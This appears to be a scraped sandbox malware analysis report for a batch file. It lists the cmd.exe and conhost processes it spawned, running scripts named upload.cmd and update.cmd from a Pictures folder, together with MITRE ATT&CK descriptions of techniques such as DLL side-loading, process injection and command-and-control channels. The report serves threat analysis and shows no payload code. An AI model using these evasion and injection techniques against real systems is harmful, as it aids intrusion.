Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4036, Parent PID: 6440

General

Target ID:	9
Start time:	12:24:02
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\las.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5680, Parent PID: 4036

General

Target ID:	10
Start time:	12:24:02
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6004, Parent PID: 6440

General

Target ID:	11
Start time:	12:24:02
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\zap.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6012, Parent PID: 6004

General

Target ID:	12
Start time:	12:24:02
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5404, Parent PID: 6440

General

Target ID:	13
Start time:	12:24:02
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\sample.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6456, Parent PID: 5404

General

Target ID:	14
Start time:	12:24:03
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2312, Parent PID: 6440

General

Target ID:	15
Start time:	12:24:03
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\xff.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1412, Parent PID: 2312

General

Target ID:	16
Start time:	12:24:03
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 920, Parent PID: 6440

General

Target ID:	17
Start time:	12:24:03
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\time.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7132, Parent PID: 920

General

Target ID:	18
Start time:	12:24:03
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7296, Parent PID: 6440

General

Target ID:	20
Start time:	12:24:03
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\upload.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7348, Parent PID: 7296

General

Target ID:	21
Start time:	12:24:03
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7372, Parent PID: 7120

General

Target ID:	22
Start time:	12:24:03
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2684 --field-trial-handle=2636,i,6799672374632597056,542459975997173422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7448, Parent PID: 6440

General

Target ID:	23
Start time:	12:24:04
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\update.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7516, Parent PID: 7448

General

Target ID:	24
Start time:	12:24:04
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7816, Parent PID: 6440

General

Target ID:	25
Start time:	12:24:04
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\info.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7852, Parent PID: 7816

General

Target ID:	26
Start time:	12:24:04
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\LICENSE

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\sets.json

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: cmd.exePID: 1768, Parent PID: 4056

General

Chronological Activities

Analysis Process: conhost.exePID: 2868, Parent PID: 1768

Windows Analysis Report
file.bat